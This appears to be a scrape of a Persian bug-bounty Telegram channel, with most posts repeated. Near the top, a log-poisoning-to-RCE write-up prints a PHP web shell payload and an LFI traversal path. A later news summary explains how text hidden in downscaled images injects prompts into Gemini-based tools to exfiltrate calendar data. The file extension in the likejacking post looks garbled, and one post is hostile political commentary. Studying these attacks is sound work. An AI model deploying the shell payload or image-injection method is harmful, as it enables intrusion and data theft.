تزریق لاگ سرور + LFI → RCE
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
❤6
پستی از استاد منصوری!
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
👍3❤1
Forwarded from World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده.
استفاده کنید ؛)
استفاده کنید ؛)
👎2
World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده. استفاده کنید ؛)
دوستان رایگان نشده عضویتش با ۵ دلار شده فکر کنم! تاریخش تموم شده دوستان!!!!
👍4👌1
Forwarded from 🕸 Articles
This media is not supported in your browser
VIEW IN TELEGRAM
مثل مجید باشیم.
جدیدا در یه سری از ابزار هایی که برای هانت استفاده میکردم اینو خیلی دیدم واقعا متاسفام برای دنیا و اروپا !
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
❤15🕊3🤡2👍1👏1
سایتهای پورنوگرافی از فایلهای آلوده .noscript به عنوان کلیکر استفاده میکنند : محققان Malwarebytes موج جدیدی از سوءاستفاده از پسوند .noscript را کشف کردهاند – این بار از دهها سایت پورنوگرافی – که از تصاویر آلوده برای فریب مرورگرهای کاربران جهت «لایک» کردن مخفیانه پستهای فیسبوک آنها استفاده میکنند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
🆒3
This media is not supported in your browser
VIEW IN TELEGRAM
حقیقتا اونا مرد تر بودن، متعهد تر بودن!
❤4👎1👌1
Forwarded from HiveNews | خبر کندو 🐝
This media is not supported in your browser
VIEW IN TELEGRAM
زمین هر ۲۳ ساعت و ۵۶ دقیقه یک بار به دور محور فرضی خود میچرخد؛ این پدیده که «حرکت وضعی» نام دارد، عامل بهوجود آمدن شب و روز است. این چرخش باعث میشود خورشید در آسمان طلوع و غروب کند، ستارگان جابهجا شوند و آسمان شب در گذر زمان تغییر کند. ثبت آسمان با یک دوربین ثابت در طول شب، رد دایرهای ستارگان را نشان میدهد که نتیجه مستقیم این حرکت است.
پروکسی 👉 پروکسی 👉 پروکسی 👉
👈کانفیگ وی پی ان رایگان👉
پروکسی 👉 پروکسی 👉 پروکسی 👉
👈کانفیگ وی پی ان رایگان👉
🆒3❤1🔥1
اطلاعیه!!!
من توی بررسی یه سایت خدماتی یه سری آسیب پذیری خطرناک کشف کردم ، که گفتن در ازای پاداش خدمات رو براتون رایگان انجام میدیم! اگر از دوستان و از کانال کسی هست که میخاد اپلیکیشن حرفه ای طراحی کنه با کمترین هزینه این موقعیت خوبیه بیاد و با هم همکاری کنیم و من معرفیش کنم و اپ خودشو ران کنه ، و از نظر هزینه هم من پاییین ترین مبلغ ممکنه نسبت به طراحی اپلیکیشن رو لحاظ میکنه!
هزینه رو به صورت توافقی جلو میبریمش! (قیمت حداقلی 50 درصد زیر قیمت)
من توی بررسی یه سایت خدماتی یه سری آسیب پذیری خطرناک کشف کردم ، که گفتن در ازای پاداش خدمات رو براتون رایگان انجام میدیم! اگر از دوستان و از کانال کسی هست که میخاد اپلیکیشن حرفه ای طراحی کنه با کمترین هزینه این موقعیت خوبیه بیاد و با هم همکاری کنیم و من معرفیش کنم و اپ خودشو ران کنه ، و از نظر هزینه هم من پاییین ترین مبلغ ممکنه نسبت به طراحی اپلیکیشن رو لحاظ میکنه!
هزینه رو به صورت توافقی جلو میبریمش! (قیمت حداقلی 50 درصد زیر قیمت)
🔥8
Forwarded from GO-TO CVE
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
Telegram
CVEdatabase
This channel archive 1️⃣ day exploits and custom exploit for CVE.
❤3
پروژه جدید امنیتی!
در باگ بانتی تا یه جایی دستی و منوال میتونی کار کنی ، بریم برا پروژه اتومیشن چندین اسیب پذیری و ریکان براش CLI و UI فرانت زدم ماهه
شاید اگر شمام موافق بودید به اشتراک گذاشتیمش! مثلا پلنیش کنیم یه 30 روزه رایگان بزاریم بعدش دیگه یه مبلغ خیلی کمی بگیریم و اشتراک بدیم! مثل شودان ولی خب این کوچیک تره
ببینیم چطور میشه !
#باگ_بانتی | #ابزار_نویسی
در باگ بانتی تا یه جایی دستی و منوال میتونی کار کنی ، بریم برا پروژه اتومیشن چندین اسیب پذیری و ریکان براش CLI و UI فرانت زدم ماهه
شاید اگر شمام موافق بودید به اشتراک گذاشتیمش! مثلا پلنیش کنیم یه 30 روزه رایگان بزاریم بعدش دیگه یه مبلغ خیلی کمی بگیریم و اشتراک بدیم! مثل شودان ولی خب این کوچیک تره
ببینیم چطور میشه !
#باگ_بانتی | #ابزار_نویسی
🔥7👎2
Life and Learning🎭
پروژه جدید امنیتی! در باگ بانتی تا یه جایی دستی و منوال میتونی کار کنی ، بریم برا پروژه اتومیشن چندین اسیب پذیری و ریکان براش CLI و UI فرانت زدم ماهه شاید اگر شمام موافق بودید به اشتراک گذاشتیمش! مثلا پلنیش کنیم یه 30 روزه رایگان بزاریم بعدش دیگه یه مبلغ…
ابزار تکمیل شد!
مکانات؟
و در قسمت آخر از این ابزار برای اسکن سریع پارامتر ها و مسیر ها و فایل ها استفاده میکنیم ! ترکیبی از چندین ابزار خوب موجود در حیطه کاری ما شده این که حالا توی تست یه ماه اول معلوم میکنه کاراییش رو
#باگ_بانتی | #ابزار
مکانات؟
+ امکان تست XSS و XXE و Client Side Injections به صورت ریل تایم
+ امکان فاز مسیر به صورت ریل تایم
+ امکان فیلتریشن بر اساس 4 حالت مختلف
+ آپشنال بودن جهت نشان دادن ریسپانس
+ بررسی و تحلیل اتوماتیک انگدینگ ها در سورس
+ سبک و با معماری دقیق
+ دارای پنل کاربری از طریق ترمینال یا CLI
+ دارای پنل کاربری از طریق مرورگر یا Browser Mode
+ دارای سوییچ های مختلف با امکانات مختلف
+ امکان بررسی استاتوس کد های مختلف
+ دارای دو حالت Browser Mode
+ کامند لاین آسان و فهمش و سرعت بالا
+ دارای فرانت اند و UI/UX کاملا بهینه و زیبا و مدرن
و در قسمت آخر از این ابزار برای اسکن سریع پارامتر ها و مسیر ها و فایل ها استفاده میکنیم ! ترکیبی از چندین ابزار خوب موجود در حیطه کاری ما شده این که حالا توی تست یه ماه اول معلوم میکنه کاراییش رو
$BugBounty>python securitysearch.py -h
usage: securitysearch.py [-h] [-w W] [-u U] [-mc MC] [-fs FS] [-fw FW] [-fl FL] [-s] [-r] [-rs] [-rl] [-rw] [-rm RM]
[-rc] [-b] [-cr] [-ba]
SecuritySearch - Web Security Fuzzer
options:
-h, --help show this help message and exit
-w W Path to wordlist
-u U Target URL (must include FUZZ and *) e.g. "https://example.com/?q=FUZZ*"
-mc MC Match status codes [all,2**,3**,4**,5**]
-fs FS Filter by response size (exclude equal)
-fw FW Filter by response word count (exclude equal)
-fl FL Filter by response line count (exclude equal)
-s Show status code
-r, --raw-matches Extract and print raw reflected values from response
-rs Show response size
-rl Show response line count
-rw Show response words count
-rm RM A special word to match in responses (required if * used in URL)
-rc Show count of special word occurrences in each response
-b, --browser Enable saving results + API access
-cr Console remove: When used with -b, do not print to terminal (only save and serve)
-ba Browser All: only run Flask UI and don't run CLI scanning
#باگ_بانتی | #ابزار
❤3
Life and Learning🎭
ابزار تکمیل شد! مکانات؟ + امکان تست XSS و XXE و Client Side Injections به صورت ریل تایم + امکان فاز مسیر به صورت ریل تایم + امکان فیلتریشن بر اساس 4 حالت مختلف + آپشنال بودن جهت نشان دادن ریسپانس + بررسی و تحلیل اتوماتیک انگدینگ ها در سورس + سبک و با معماری…
سوییچ -ba داره که ایطوری استفاده میشه
و وقتی اینو میزنی وب سرور ران میشه و کل ابزار و کامند هاشو از طریق بروزر استفاده میکنی و نتایج رو میبینی! جالبییش هم اینه نتایج رو که ذخیره میکنه یه UUID v4 میده که فقط از طریق اون ایدی میتونی دسترسی پیدا کنی به ریزالتت
python securitysearch.py -ba
و وقتی اینو میزنی وب سرور ران میشه و کل ابزار و کامند هاشو از طریق بروزر استفاده میکنی و نتایج رو میبینی! جالبییش هم اینه نتایج رو که ذخیره میکنه یه UUID v4 میده که فقط از طریق اون ایدی میتونی دسترسی پیدا کنی به ریزالتت
❤3
Forwarded from OnHex
🔴 محققای Trail of Bits یک روش حمله ی جدیدی رو پیاده سازی کردن که از طریق تزریق پرامپتهای مخرب در تصاویر پردازش شده توسط سیستمهای هوش مصنوعی، دادههای کاربران رو میدزدن.
این تحقیق بر مبنای نظریهای است که در مقالهای از کنفرانس USENIX 2020 توسط دانشگاه آلمانی TU Braunschweig ارائه شده.
وقتی کاربر تصویری رو در سیستمهای هوش مصنوعی آپلود میکنه، این تصاویر بطور خودکار برای بهبود کارایی و کاهش هزینه، از طریق الگوریتمهای Resampling مانند Nearest Neighbor، Bilinear یا Bicubic interpolation به کیفیت پایینتر Downscale میشه.
وقتی تصویر بزرگ رو کوچیک میکنیم، باید پیکسلهای زیادی رو در یک فضای کوچیک جا بدیم، بنابراین الگوریتمها نمیتونن تمام جزییات تصویر اصلی رو بصورت کامل نگه دارن. بنابراین روی تصویر کوچیک شده یسری خطای دید یا طرحهای اضافی بوجود میاد که اصطلاحا بهشون Aliasing میگن.
مهاجم تصویری رو میسازه که وقتی کوچیک شد و این Aliasing رخ داد، الگوهای مخفی ظاهر میشه.
در نمونهی Trail of Bits، بخشهای تیرهی خاصی از تصویر مخرب هنگام پردازش با روش Bicubic downscaling به رنگ قرمز درمیاد و در نتیجه متن مخفی به رنگ سیاه ظاهر میشه.
مدل هوش مصنوعی این متن رو بخشی از دستور کاربر تفسیر کرده و بطور خودکار اونو با ورودی اصلی ترکیب میکنه.
از دید کاربر هیچ چیز غیرعادی بنظر نمیرسه، اما در عمل، مدل دستورالعملهای مخفی رو اجرا کرده که میتونه به نشت داده یا اقدامات پرخطر دیگه منجر بشه.
برای مثال، در یک حملهی تستی علیه Gemini CLI، پژوهشگران تونستن دادههای Google Calendar رو به یک آدرس ایمیل دلخواه ارسال کنن.
محققای Trail of Bits توضیح میدن که این حمله باید متناسب با هر مدل هوش مصنوعی و الگوریتم downscaling مورد استفادهی اون تنظیم بشه. با این حال، پژوهشگران تأیید کردن که روششون در برابر سیستمهای زیر قابل استفاده است:
Google Gemini CLI
Vertex AI Studio (with Gemini backend)
Gemini's web interface
Gemini's API via the llm CLI
Google Assistant on an Android phone
Genspark
از آنجا که این بردار حمله گسترده هستش، میتونه فراتر از ابزارهای تست شده هم شامل بشه. همچنین برای نمایش یافتههای خودشون، ابزار متنباز Anamorpher رو منتشر کردن که میتونه برای هر یک از روشهای Downscaling ذکرشده تصویر مخرب تولید کنه.
محققای Trail of Bits توصیه میکنن سیستمهای هوش مصنوعی در زمان آپلود تصاویر توسط کاربران، محدودیتهای ابعادی اعمال کنن. اگه Downscaling ضروری بود، بهتره پیشنمایشی از تصویر نهایی که به LLM ارسال خواهد شد، به کاربر نمایش داده بشه.
همچنین تأکید میکنن که باید برای اجرای دستورات حساس تأیید صریح کاربر دریافت بشه.
#هوش_مصنوعی
#AI
🆔 @onhex_ir
➡️ ALL Link
این تحقیق بر مبنای نظریهای است که در مقالهای از کنفرانس USENIX 2020 توسط دانشگاه آلمانی TU Braunschweig ارائه شده.
وقتی کاربر تصویری رو در سیستمهای هوش مصنوعی آپلود میکنه، این تصاویر بطور خودکار برای بهبود کارایی و کاهش هزینه، از طریق الگوریتمهای Resampling مانند Nearest Neighbor، Bilinear یا Bicubic interpolation به کیفیت پایینتر Downscale میشه.
وقتی تصویر بزرگ رو کوچیک میکنیم، باید پیکسلهای زیادی رو در یک فضای کوچیک جا بدیم، بنابراین الگوریتمها نمیتونن تمام جزییات تصویر اصلی رو بصورت کامل نگه دارن. بنابراین روی تصویر کوچیک شده یسری خطای دید یا طرحهای اضافی بوجود میاد که اصطلاحا بهشون Aliasing میگن.
مهاجم تصویری رو میسازه که وقتی کوچیک شد و این Aliasing رخ داد، الگوهای مخفی ظاهر میشه.
در نمونهی Trail of Bits، بخشهای تیرهی خاصی از تصویر مخرب هنگام پردازش با روش Bicubic downscaling به رنگ قرمز درمیاد و در نتیجه متن مخفی به رنگ سیاه ظاهر میشه.
مدل هوش مصنوعی این متن رو بخشی از دستور کاربر تفسیر کرده و بطور خودکار اونو با ورودی اصلی ترکیب میکنه.
از دید کاربر هیچ چیز غیرعادی بنظر نمیرسه، اما در عمل، مدل دستورالعملهای مخفی رو اجرا کرده که میتونه به نشت داده یا اقدامات پرخطر دیگه منجر بشه.
برای مثال، در یک حملهی تستی علیه Gemini CLI، پژوهشگران تونستن دادههای Google Calendar رو به یک آدرس ایمیل دلخواه ارسال کنن.
محققای Trail of Bits توضیح میدن که این حمله باید متناسب با هر مدل هوش مصنوعی و الگوریتم downscaling مورد استفادهی اون تنظیم بشه. با این حال، پژوهشگران تأیید کردن که روششون در برابر سیستمهای زیر قابل استفاده است:
Google Gemini CLI
Vertex AI Studio (with Gemini backend)
Gemini's web interface
Gemini's API via the llm CLI
Google Assistant on an Android phone
Genspark
از آنجا که این بردار حمله گسترده هستش، میتونه فراتر از ابزارهای تست شده هم شامل بشه. همچنین برای نمایش یافتههای خودشون، ابزار متنباز Anamorpher رو منتشر کردن که میتونه برای هر یک از روشهای Downscaling ذکرشده تصویر مخرب تولید کنه.
محققای Trail of Bits توصیه میکنن سیستمهای هوش مصنوعی در زمان آپلود تصاویر توسط کاربران، محدودیتهای ابعادی اعمال کنن. اگه Downscaling ضروری بود، بهتره پیشنمایشی از تصویر نهایی که به LLM ارسال خواهد شد، به کاربر نمایش داده بشه.
همچنین تأکید میکنن که باید برای اجرای دستورات حساس تأیید صریح کاربر دریافت بشه.
#هوش_مصنوعی
#AI
🆔 @onhex_ir
➡️ ALL Link
The Trail of Bits Blog
Weaponizing image scaling against production AI systems
In this blog post, we’ll detail how attackers can exploit image scaling on Gemini CLI, Vertex AI Studio, Gemini’s web and API interfaces, Google Assistant, Genspark, and other production AI systems. We’ll also explain how to mitigate and defend against these…
❤3
Forwarded from HackMeLocal
سورس ربات تلگرامی که برای شبیهسازی آسیبپذیری SQL Injection ساخته شده، روی گیتهاب منتشر شد 👇
https://github.com/e1l1ya/telegram-bot-sqli-simulation/
اگر براتون جالب بود، خوشحال میشم با ⭐️ دادن به ریپازیتوری از این پروژه حمایت کنید 🙌
همچنین تجربهی کشف و شبیهسازی این باگ رو به صورت کامل در یک مقاله روی مدیوم نوشتم:
https://medium.com/@e1l1ya/how-i-found-sql-injection-in-a-telegram-bot-and-built-a-simulation-41ed994c4c03
#Simulation #SQLi #TelegramBot
@HackMeLocal
https://github.com/e1l1ya/telegram-bot-sqli-simulation/
اگر براتون جالب بود، خوشحال میشم با ⭐️ دادن به ریپازیتوری از این پروژه حمایت کنید 🙌
همچنین تجربهی کشف و شبیهسازی این باگ رو به صورت کامل در یک مقاله روی مدیوم نوشتم:
https://medium.com/@e1l1ya/how-i-found-sql-injection-in-a-telegram-bot-and-built-a-simulation-41ed994c4c03
#Simulation #SQLi #TelegramBot
@HackMeLocal
GitHub
GitHub - e1l1ya/telegram-bot-sqli-simulation
Contribute to e1l1ya/telegram-bot-sqli-simulation development by creating an account on GitHub.
اشتراک ساخت وب اپلیکیشن ، اپ اندروید و IOS نامحدود پلاس
امکانات :
+ فضای حافظه: نامحدود
+ تعداد صفحات: نامحدود
+ هاست و دامنه خصوصی
+ دائمی بدون نیاز به تمدید
+ پشتیبانی یک ساله
+ طراحی پرایوت و دیزان خصوصی
+ سایت بهینه (سئوی تکنیکال)
+ یک اپلیکیشن و یک وبسایت با قابلیت PWA
متصل و همگام بایکدیگر
مبلغ : قطعا کمتر از هزینه خود وبسایت
و کلی امکانات دیگه اگر مایل بودید بگین توضیحات کامل رو ارسال کنم براتون !
https://news.1rj.ru/str/AlI_VD2005
#همکاری
امکانات :
+ فضای حافظه: نامحدود
+ تعداد صفحات: نامحدود
+ هاست و دامنه خصوصی
+ دائمی بدون نیاز به تمدید
+ پشتیبانی یک ساله
+ طراحی پرایوت و دیزان خصوصی
+ سایت بهینه (سئوی تکنیکال)
+ یک اپلیکیشن و یک وبسایت با قابلیت PWA
متصل و همگام بایکدیگر
مبلغ : قطعا کمتر از هزینه خود وبسایت
و کلی امکانات دیگه اگر مایل بودید بگین توضیحات کامل رو ارسال کنم براتون !
https://news.1rj.ru/str/AlI_VD2005
#همکاری
❤4